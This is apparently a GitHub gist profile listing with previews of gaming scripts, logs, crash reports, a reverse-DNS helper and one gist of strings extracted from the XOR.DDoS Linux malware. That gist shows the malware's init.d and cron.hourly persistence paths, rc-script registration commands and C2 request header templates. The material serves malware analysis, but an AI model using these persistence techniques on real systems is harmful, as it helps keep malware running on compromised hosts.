Skip to content

Instantly share code, notes, and snippets.

View Morketh's full-sized avatar
🎶
You know....

Andrew Malone Morketh

🎶
You know....
View GitHub Profile
@Morketh
Morketh / Script.cs
Created September 3, 2018 09:32 — forked from ZerothAngel/Script.cs
Space Engineers Smart Undock (WIP)
// Generated from ZerothAngel's SEScripts version 56430963671f tip
// Modules: undocktest, smartundock, gyrocontrol, thrustcontrol, shiporientation, shipcontrol, translateauto, pid, velocimeter, eventdriver, commons
// SmartUndock (ship-dependent)
const double SMART_UNDOCK_RTB_SPEED = 25.0; // In meters per second
const double AUTOPILOT_MIN_SPEED = 1.0; // In meters per second
const double AUTOPILOT_TTT_BUFFER = 5.0; // Time-to-target buffer, in seconds
const double AUTOPILOT_DISENGAGE_DISTANCE = 5.0; // In meters
// SmartUndock
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="HWiNFO64 v5.10-2700">
<STYLE>
A { text-decoration: none }
A:hover { text-decoration: underline }
TD { font: 80% verdana, tahoma, ms sans serif, arial; color: #000000; vertical-align: text-center; text-align: left }
TD.dn { font: 70% verdana, tahoma, ms sans serif, arial; color: #000000; vertical-align: text-center }
TD.di { font: bold 80% verdana, tahoma, ms sans serif, arial; color: #000000; vertical-align: text-center }
TD.ds { font: bold 80% verdana, tahoma, ms sans serif, arial; color: #000080; vertical-align: text-center }
@Morketh
Morketh / airtime-check-system.txt
Created December 16, 2015 19:59
airtime-liquidsoap wont start?
AIRTIME_STATUS_URL = http://uss-broadway.clarb.lan:80/api/status/format/json/api_key/%%api_key%%
AIRTIME_SERVER_RESPONDING = OK
KERNEL_VERSION = 3.13.0-71-generic
MACHINE_ARCHITECTURE = x86_64
TOTAL_MEMORY_MBYTES = 985048
TOTAL_SWAP_MBYTES = 1013756
AIRTIME_VERSION = 2.5.1
OS = Ubuntu 14.04.3 LTS x86_64
CPU = AMD Sempron(tm) Processor 3100+
WEB_SERVER = Apache/2.4.7 (Ubuntu)
@Morketh
Morketh / rdns.py
Created December 15, 2015 07:00 — forked from pklaus/rdns.py
This is a Python script that helps you create reverse DNS zone files for the Bind Name Server. See http://goo.gl/CJwly
#!/usr/bin/env python
"""
rdns.py
This is a Python script that helps you create
reverse DNS zone files for the Bind Name Server.
I published it together with this blog post: http://goo.gl/CJwly .
"""
2015-12-10 18:58:17.789 - Thread: 1 -> Log Started
2015-12-10 18:58:17.799 - Thread: 1 -> Timezone (local - UTC): -7h
2015-12-10 18:58:17.799 - Thread: 1 -> App Version: 01_112_010
2015-12-10 18:58:17.799 - Thread: 1 -> Steam build: Always true
2015-12-10 18:58:17.799 - Thread: 1 -> Is official: True [NO][IS][NAMP]
2015-12-10 18:58:17.799 - Thread: 1 -> Environment.ProcessorCount: 4
2015-12-10 18:58:17.799 - Thread: 1 -> Environment.OSVersion: Microsoft Windows NT 6.1.7601 Service Pack 1
2015-12-10 18:58:17.799 - Thread: 1 -> Environment.CommandLine: "C:\Program Files (x86)\Steam\steamapps\common\SpaceEngineers\Bin64\SpaceEngineers.exe"
2015-12-10 18:58:17.799 - Thread: 1 -> Environment.Is64BitProcess: True
2015-12-10 18:58:17.799 - Thread: 1 -> Environment.Is64BitOperatingSystem: True
@Morketh
Morketh / Embedded_HTTP_Header.txt
Created December 4, 2015 18:50
XORDDOS Generation 2
^@/etc/init.d/%s^@/etc/cron.hourly/gcc.sh^@/etc/rc%d.d/S90%s^@/etc/rc.d/rc%d.d/S90%s^@--add^@chkconfig^@defaults^@update-rc.d^@^@sed -i '/\/etc\/cron.hourly$
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
^@Connection: Keep-Alive
^@http://^@^@POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
%s%s^@GET %s HTTP/1.1
@Morketh
Morketh / Forestry_LogisticsPipes.log
Created December 1, 2015 19:11
forestry.core.items.ItemCrated
[11:51:28] [Server thread/WARN] [LogisticsPipes/]: Detected pipe with unknown key (forestry.core.items.ItemCrated@5615c89d). Did you remove a buildcraft addon?
[11:51:29] [Server thread/WARN] [LogisticsPipes/]: Detected pipe with unknown key (forestry.core.items.ItemCrated@767c4047). Did you remove a buildcraft addon?
[11:51:29] [Server thread/WARN] [LogisticsPipes/]: Detected pipe with unknown key (forestry.core.items.ItemCrated@767c4047). Did you remove a buildcraft addon?
[11:51:29] [Server thread/WARN] [LogisticsPipes/]: Detected pipe with unknown key (forestry.core.items.ItemCrated@767c4047). Did you remove a buildcraft addon?
[11:51:29] [Server thread/WARN] [LogisticsPipes/]: Detected pipe with unknown key (forestry.core.items.ItemCrated@767c4047). Did you remove a buildcraft addon?
[11:51:29] [Server thread/WARN] [LogisticsPipes/]: Detected pipe with unknown key (forestry.core.items.ItemCrated@767c4047). Did you remove a buildcraft addon?
[11:51:29] [Server thread/WARN] [LogisticsPipes/]: Detected pipe
@Morketh
Morketh / crash-2015-12-01_11.43.33-server.txt
Created December 1, 2015 18:47
Yet Another Crash Report (YACR)
---- Minecraft Crash Report ----
// Quite honestly, I wouldn't worry myself about that.
Time: 12/1/15 11:43 AM
Description: Ticking block entity
java.lang.NullPointerException: Ticking block entity
at dan200.computercraft.shared.computer.blocks.TileComputerBase.getFamily(TileComputerBase.java:412)
at dan200.computercraft.shared.turtle.blocks.TileTurtle.createComputer(TileTurtle.java:97)
at dan200.computercraft.shared.turtle.blocks.TileTurtle.createComputer(TileTurtle.java:115)
[1.7.10]Treecapitator-universal-2.0.4.jar
ABO-MC1.7.10-BC7.1release4.0.3.jar
AgeOfMinecraft-1.7.10-0.0.3a.jar
buildcraft-7.1.13.jar
buildcraft-compat-7.1.1.jar
CodeChickenCore-1.7.10-1.0.7.47-universal.jar
ComputerCraft1.74.jar
Dynmap-2.1-forge-1.7.10.jar
EnderCore-1.7.10-0.1.0.26_beta.jar
EnderIO-1.7.10-2.2.8.381.jar
---- Minecraft Crash Report ----
// Ooh. Shiny.
Time: 11/2/15 3:49 PM
Description: Ticking block entity
java.lang.IllegalArgumentException: gameProfile must not be null
at forestry.mail.MailAddress.<init>(MailAddress.java:40)
at forestry.mail.PostRegistry.getMailAddress(PostRegistry.java:179)
at forestry.mail.tiles.TileMailbox.getOrCreateMailInventory(TileMailbox.java:92)